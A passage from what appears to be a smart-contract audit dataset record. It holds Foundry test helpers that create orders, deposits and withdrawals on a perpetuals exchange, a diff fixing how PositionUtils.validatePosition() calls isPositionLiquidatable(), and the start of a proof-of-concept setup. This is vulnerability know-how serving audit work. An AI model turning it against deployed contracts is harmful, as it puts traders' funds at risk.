18 entries, each entry takes 8 bits, so we just need one element\\n\\n uint256[] memory compactedMaxPricesIndexes = new uint256[](1);\\n compactedMaxPricesIndexes[0] = 1; \\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n \\n // 3 signers and 6 tokens, so we need 3*6 signatures\\n bytes[] memory signatures = new bytes[](18);\\n for(uint i; i<18; i++){\\n signatures[i] = abi.encode(\"SIGNATURE\");\\n }\\n address[] memory priceFeedTokens;\\n\\n OracleUtils.SetPricesParams memory priceParams = OracleUtils.SetPricesParams(\\n signerInfo,\\n tokens,\\n compactedMinOracleBlockNumbers,\\n compactedMaxOracleBlockNumbers,\\n compactedOracleTimestamps,\\n compactedDecimals,\\n compactedMinPrices, \\n compactedMinPricesIndexes,\\n compactedMaxPrices, \\n compactedMaxPricesIndexes, \\n signatures, \\n 
priceFeedTokens\\n );\\n return priceParams;\\n}\\n\\n/* \\n* The current index token price (85, 90), a trader sets a trigger price to 100 and then acceptabiel price to 95.\\n* He like to long the index token. \\n* 1. Pick the primary price 90 since we long, so choose the max\\n* 2. Make sure 90 < 100, and pick (90, 100) as the custom price since we long\\n* 3. Choose price 95 since 95 is within the range, and it is the highest acceptible price. Choosing 90 \\n* will be in favor of the trader\\n* \\n*/\\n\\nfunction createMarketSwapOrder(address account, address inputToken, uint256 inAmount) public returns(bytes32)\\n{ \\n address[] memory swapPath = new address[](1);\\n swapPath[0] = _marketProps1.marketToken;\\n // swapPath[0] = _marketPropsAB.marketToken;\\n // swapPath[1] = _marketPropsBC.marketToken;\\n // swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account; // the account is the receiver\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = account; // set myself as the ui receiver\\n // params.addresses.market = marketToken;\\n params.addresses.initialCollateralToken = inputToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n // params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n params.numbers.initialCollateralDeltaAmount = inAmount ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(inputToken).transfer(address(_orderVault), inAmount); // this is the real amount\\n\\n\\n // params.numbers.triggerPrice = triggerPrice;\\n // params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n // params.numbers.initialCollateralDeltaAmount = inAmount;\\n 
params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketSwap;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n // params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n}\\n\\n\\n\\nfunction createLiquidationOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n 
params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.Liquidation;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createStopLossDecrease(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n 
params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.StopLossDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createLimitDecreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower 
effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.LimitDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\nfunction createLimitIncreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice; // used for limit order\\n params.numbers.acceptablePrice = 121000000000000; // I can buy with 
this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.LimitIncrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\n\\nfunction createMarketDecreaseOrder(address account, address marketToken, address collateralToken, uint256 acceptablePrice, uint256 sizeInUsd, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeInUsd; // how much dollar to decrease, will convert into amt of tokens to decrease in long/short based on the execution price\\n params.numbers.initialCollateralDeltaAmount = 13e18; // this is actually useless, will be overidden by real transfer amount\\n // vm.prank(account); \\n // IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n 
params.numbers.triggerPrice = 0;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 10e18; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createMarketIncreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n 
params.numbers.triggerPrice = 0;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketIncrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createWithdraw(address withdrawor, uint marketTokenAmount) public returns (bytes32)\\n{\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n console.log(\"createWithdraw with withdrawor: \");\\n console.logAddress(withdrawor);\\n vm.prank(withdrawor); \\n _wnt.transfer(address(_withdrawalVault), 3200); // execution fee\\n\\n vm.prank(withdrawor);\\n ERC20(_marketProps1.marketToken).transfer(address(_withdrawalVault), marketTokenAmount);\\n\\n WithdrawalUtils.CreateWithdrawalParams memory params = WithdrawalUtils.CreateWithdrawalParams(\\n withdrawor, // receiver\\n address(0), // call back function\\n uiFeeReceiver, // uiFeeReceiver\\n _marketProps1.marketToken, // which market token to withdraw\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 123, // minLongTokenAmount\\n 134, // minShortTokenAmount\\n false, // shouldUnwrapNativeToken\\n 3200, // execution fee\\n 3200 // callback gas limit\\n );\\n\\n vm.prank(withdrawor);\\n bytes32 key = _erouter.createWithdrawal(params);\\n return key;\\n}\\n\\n\\nfunction createDepositNoSwap(Market.Props memory marketProps, address depositor, uint amount, bool isLong) public returns (bytes32){\\n address[] memory 
longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n console.log(\"createDeposit with depositor: \");\\n console.logAddress(depositor);\\n\\n vm.prank(depositor);\\n _wnt.transfer(address(_depositVault), 3200); // execution fee\\n if(isLong){\\n console2.log(\"000000000000000000\");\\n vm.prank(depositor);\\n IERC20(marketProps.longToken).transfer(address(_depositVault), amount); \\n console2.log(\"bbbbbbbbbbbbbbbbbbbbbb\");\\n }\\n else {\\n console2.log(\"111111111111111111111111\");\\n console2.log(\"deposit balance: %d, %d\", IERC20(marketProps.shortToken).balanceOf(depositor), amount);\\n vm.prank(depositor);\\n IERC20(marketProps.shortToken).transfer(address(_depositVault), amount);\\n console2.log(\"qqqqqqqqqqqqqqqqqq\");\\n }\\n \\n\\n DepositUtils.CreateDepositParams memory params = DepositUtils.CreateDepositParams(\\n depositor,\\n address(0),\\n uiFeeReceiver,\\n marketProps.marketToken,\\n marketProps.longToken,\\n marketProps.shortToken,\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 100000, // minMarketTokens\\n true,\\n 3200, // execution fee\\n 3200 // call back gas limit\\n );\\n\\n console2.log(\"aaaaaaaaaaaaaaaaaaaaaaaaa\");\\n vm.prank(depositor);\\n bytes32 key1 = _erouter.createDeposit(params);\\n\\n return key1;\\n}\\n\\n/*\\nfunction testCancelDeposit() public \\n{\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n address(_wnt).call{value: 100e8}(\"\");\\n _wnt.transfer(address(_depositVault), 1e6);\\n DepositUtils.CreateDepositParams memory params = DepositUtils.CreateDepositParams(\\n msg.sender,\\n address(0),\\n address(111),\\n _marketProps1.marketToken,\\n _marketProps1.longToken,\\n _marketProps1.shortToken,\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 100000, // minMarketTokens\\n true,\\n 3200, // execution fee\\n 3200 // call back gas limit\\n );\\n\\n bytes32 key1 = _erouter.createDeposit(params);\\n\\n console.log(\"WNT balance of address(222) before cancelllation: %s\", 
_wnt.balanceOf(address(222)));\\n console.log(\"WNT balance of address(this) before cancelllation: %s\", _wnt.balanceOf(address(this))); \\n\\n _roleStore.grantRole(address(222), Role.CONTROLLER); // to save a market's props\\n vm.prank(address(222));\\n _depositHandler.cancelDeposit(key1);\\n console.log(\"WNT balance of address(222) after cancelllation: %s\", _wnt.balanceOf(address(222)));\\n console.log(\"WNT balance of address(this) after cancelllation: %s\", _wnt.balanceOf(address(this))); \\n}\\n*/\\n\\nfunction testERC165() public{\\n bool yes = _wnt.supportsInterface(type(IWNT).interfaceId);\\n console2.log(\"wnt suppports deposit?\");\\n console2.logBool(yes);\\n vm.expectRevert();\\n yes = IERC165(address(_sol)).supportsInterface(type(IWNT).interfaceId);\\n console2.logBool(yes);\\n\\n if(ERC165Checker.supportsERC165(address(_wnt))){\\n console2.log(\"_wnt supports ERC165\");\\n }\\n if(ERC165Checker.supportsERC165(address(_sol))){\\n console2.log(\"_sol supports ERC165\");\\n }\\n}\\n\\n function justError() external {\\n // revert Unauthorized(\"abcdefg\"); // 973d02cb\\n // revert(\"abcdefg\"); // 0x08c379a, Error selector\\n // require(false, \"abcdefg\"); // 0x08ce79a, Error selector\\n assert(3 == 4); // Panic: 0x4e487b71\\n }\\n\\n function testErrorMessage() public{\\n\\n try this.justError(){} \\n catch (bytes memory reasonBytes) {\\n (string memory msg, bool ok ) = ErrorUtils.getRevertMessage(reasonBytes);\\n console2.log(\"Error Message: \"); console2.logString(msg);\\n console2.log(\"error?\"); console2.logBool(ok);\\n } \\n }\\n\\n \\n function printAddresses() public{\\n console2.log(\"_orderVault:\"); console2.logAddress(address(_orderVault));\\n console2.log(\"marketToken:\"); console2.logAddress(address(_marketProps1.marketToken));\\n } \\n\\n function printPoolsAmounts() public{\\n console2.log(\"\\n The summary of pool amounts: \");\\n \\n uint256 amount = MarketUtils.getPoolAmount(_dataStore, _marketProps1, _marketProps1.longToken);\\n 
console2.log(\"Market: _marketProps1, token: long/nwt, amount: %d\", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketProps1, _marketProps1.shortToken);\\n console2.log(\"Market: _marketProps1, token: short/USDC, amount: %d\", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsAB, _marketPropsAB.longToken);\\n console2.log(\"Market: _marketPropsAB, token: long/A, amount: %d\", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsAB, _marketPropsAB.shortToken);\\n console2.log(\"Market: _marketPropsAB, token: short/B, amount: %d\", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsBC, _marketPropsBC.longToken);\\n console2.log(\"Market: _marketPropsBC, token: long/B, amount:%d\", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsBC, _marketPropsBC.shortToken);\\n console2.log(\"Market: _marketPropsBC, token: short/C, amount: %d\", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsCwnt, _marketPropsCwnt.longToken);\\n console2.log(\"Market: _marketPropsCwnt, token: long/C, amount: %d\", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsCwnt, _marketPropsCwnt.shortToken);\\n console2.log(\"Market: _marketPropsCwnt, token: short/wnt, amount: %d\", amount);\\n \\n\\n console2.log(\"\\n\");\\n }\\n \\n}\\n```\\nчPass false always to isPositionLiquidatable():\\n```\\n function validatePosition(\\n DataStore dataStore,\\n IReferralStorage referralStorage,\\n Position.Props memory position,\\n Market.Props memory market,\\n MarketUtils.MarketPrices memory prices,\\n bool isIncrease,\\n bool shouldValidateMinPositionSize,\\n bool shouldValidateMinCollateralUsd\\n ) public view {\\n if (position.sizeInUsd() == 0 || position.sizeInTokens() == 0) {\\n revert Errors.InvalidPositionSizeValues(position.sizeInUsd(), position.sizeInTokens());\\n }\\n\\n MarketUtils.validateEnabledMarket(dataStore, market.marketToken);\\n 
MarketUtils.validateMarketCollateralToken(market, position.collateralToken());\\n\\n if (shouldValidateMinPositionSize) {\\n uint256 minPositionSizeUsd = dataStore.getUint(Keys.MIN_POSITION_SIZE_USD);\\n if (position.sizeInUsd() < minPositionSizeUsd) {\\n revert Errors.MinPositionSize(position.sizeInUsd(), minPositionSizeUsd);\\n }\\n }\\n\\n if (isPositionLiquidatable(\\n dataStore,\\n referralStorage,\\n position,\\n market,\\n prices,\\n// Remove the line below\\n isIncrease,\\n// Add the line below\\n false,\\n shouldValidateMinCollateralUsd\\n )) {\\n revert Errors.LiquidatablePosition();\\n }\\n }\\n```\\nчPositionUtils.validatePosition() uses `isIncrease` instead of `false` when calling isPositionLiquidatable(), making it not work properly for the case of `isIncrease` = true. A liquidation should always be considered as a decrease order in terms of evaluating price impact.ч```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"../contracts/role/RoleStore.sol\";\\nimport \"../contracts/router/ExchangeRouter.sol\";\\nimport \"../contracts/data/DataStore.sol\";\\nimport \"../contracts/referral/ReferralStorage.sol\";\\n\\nimport \"../contracts/token/IWNT.sol\";\\nimport \"../contracts/token/WNT.sol\";\\nimport \"../contracts/token/SOLToken.sol\";\\nimport \"../contracts/token/USDC.sol\";\\nimport \"../contracts/token/tokenA.sol\";\\nimport \"../contracts/token/tokenB.sol\";\\nimport \"../contracts/token/tokenC.sol\";\\n\\nimport \"../contracts/market/MarketFactory.sol\";\\nimport \"../contracts/deposit/DepositUtils.sol\";\\nimport \"../contracts/oracle/OracleUtils.sol\";\\nimport \"@openzeppelin/contracts/utils/introspection/ERC165Checker.sol\";\\nimport \"../contracts/withdrawal/WithdrawalUtils.sol\";\\nimport \"../contracts/order/Order.sol\";\\nimport \"../contracts/order/BaseOrderUtils.sol\";\\nimport \"../contracts/price/Price.sol\";\\nimport \"../contracts/utils/Debug.sol\";\\nimport 
\"../contracts/position/Position.sol\";\\nimport \"../contracts/exchange/LiquidationHandler.sol\";\\nimport \"../contracts/utils/Calc.sol\";\\nimport \"@openzeppelin/contracts/utils/math/SignedMath.sol\";\\nimport \"@openzeppelin/contracts/utils/math/SafeCast.sol\";\\n\\n\\ncontract CounterTest is Test, Debug{\\n using SignedMath for int256;\\n using SafeCast for uint256;\\n\\n\\n WNT _wnt; \\n USDC _usdc;\\n SOLToken _sol;\\n tokenA _tokenA;\\n tokenB _tokenB;\\n tokenC _tokenC;\\n\\n RoleStore _roleStore;\\n Router _router;\\n DataStore _dataStore;\\n EventEmitter _eventEmitter;\\n DepositVault _depositVault;\\n OracleStore _oracleStore; \\n Oracle _oracle;\\n DepositHandler _depositHandler;\\n WithdrawalVault _withdrawalVault;\\n WithdrawalHandler _withdrawalHandler;\\n OrderHandler _orderHandler;\\n SwapHandler _swapHandler;\\n LiquidationHandler _liquidationHandler;\\n ReferralStorage _referralStorage;\\n OrderVault _orderVault;\\n ExchangeRouter _erouter;\\n MarketFactory _marketFactory;\\n Market.Props _marketProps1;\\n Market.Props _marketPropsAB;\\n Market.Props _marketPropsBC;\\n Market.Props _marketPropsCwnt;\\n \\n \\n address depositor1;\\n address depositor2;\\n address depositor3;\\n address uiFeeReceiver = address(333);\\n\\n\\n function testGetFundingAmountPerSizeDelta() public{\\n uint result = MarketUtils.getFundingAmountPerSizeDelta(2e15, 1e15+1, true);\\n console2.log(\"result: %d\", result);\\n uint256 correctResult = 2e15 * 1e15 * 1e30 + 1e15; // this is a real round up\\n correctResult = correctResult/(1e15+1);\\n console2.log(\"correctResult: %d\", correctResult);\\n assertTrue(result == 1e15 * 1e30);\\n }\\n\\n \\n\\n function setUp() public {\\n _wnt = new WNT();\\n _usdc = new USDC();\\n _sol = new SOLToken();\\n _tokenA = new tokenA();\\n _tokenB = new tokenB();\\n _tokenC = new tokenC();\\n \\n\\n\\n _roleStore = new RoleStore();\\n _router = new Router(_roleStore);\\n _dataStore = new DataStore(_roleStore);\\n \\n _eventEmitter= new 
EventEmitter(_roleStore);\\n _depositVault = new DepositVault(_roleStore, _dataStore);\\n _oracleStore = new OracleStore(_roleStore, _eventEmitter);\\n _oracle = new Oracle(_roleStore, _oracleStore);\\n console2.logString(\"_oracle:\"); console2.logAddress(address(_oracle));\\n \\n _depositHandler = new DepositHandler(_roleStore, _dataStore, _eventEmitter, _depositVault, _oracle);\\n console2.logString(\"_depositHandler:\"); console2.logAddress(address(_depositHandler));\\n \\n\\n _withdrawalVault = new WithdrawalVault(_roleStore, _dataStore);\\n _withdrawalHandler = new WithdrawalHandler(_roleStore, _dataStore, _eventEmitter, _withdrawalVault, _oracle);\\n \\n \\n _swapHandler = new SwapHandler(_roleStore);\\n _orderVault = new OrderVault(_roleStore, _dataStore);\\n _referralStorage = new ReferralStorage();\\n\\n\\n \\n _orderHandler = new OrderHandler(_roleStore, _dataStore, _eventEmitter, _orderVault, _oracle, _swapHandler, _referralStorage); \\n _erouter = new ExchangeRouter(_router, _roleStore, _dataStore, _eventEmitter, _depositHandler, _withdrawalHandler, _orderHandler);\\n console2.logString(\"_erouter:\"); console2.logAddress(address(_erouter));\\n _liquidationHandler = new LiquidationHandler(_roleStore, _dataStore, _eventEmitter, _orderVault, _oracle, _swapHandler, _referralStorage);\\n \\n _referralStorage.setHandler(address(_orderHandler), true); \\n\\n /* set myself as the controller so that I can set the address of WNT (wrapped native token contracdt) */\\n _roleStore.grantRole(address(this), Role.CONTROLLER);\\n _roleStore.grantRole(address(this), Role.MARKET_KEEPER);\\n \\n _dataStore.setUint(Keys.MAX_SWAP_PATH_LENGTH, 5); // at most 5 markets in the path\\n \\n _dataStore.setAddress(Keys.WNT, address(_wnt));\\n\\n /* set the token transfer gas limit for wnt as 3200 */\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_wnt)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_usdc)), 32000); \\n \\n\\n /* create a market (SQL, 
WNT, ETH, USDC) */\\n _marketFactory = new MarketFactory(_roleStore, _dataStore, _eventEmitter);\\n console2.logString(\"_marketFactory:\"); console2.logAddress(address(_marketFactory));\\n _roleStore.grantRole(address(_marketFactory), Role.CONTROLLER); // to save a market's props\\n _roleStore.grantRole(address(_erouter), Role.CONTROLLER); \\n _roleStore.grantRole(address(_depositHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_withdrawalHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_swapHandler), Role.CONTROLLER);\\n _roleStore.grantRole(address(_orderHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_liquidationHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_oracleStore), Role.CONTROLLER); // so it can call EventEmitter\\n _roleStore.grantRole(address(_oracle), Role.CONTROLLER); // so it can call EventEmitter\\n _roleStore.grantRole(address(this), Role.ORDER_KEEPER);\\n _roleStore.grantRole(address(this), Role.LIQUIDATION_KEEPER);\\n\\n \\n _marketProps1 = _marketFactory.createMarket(address(_sol), address(_wnt), address(_usdc), keccak256(abi.encode(\"sol-wnt-usdc\"))); \\n _marketPropsAB = _marketFactory.createMarket(address(0), address(_tokenA), address(_tokenB), keccak256(abi.encode(\"swap-tokenA-tokenB\"))); \\n _marketPropsBC = _marketFactory.createMarket(address(0), address(_tokenB), address(_tokenC), keccak256(abi.encode(\"swap-tokenB-tokenC\"))); \\n _marketPropsCwnt = 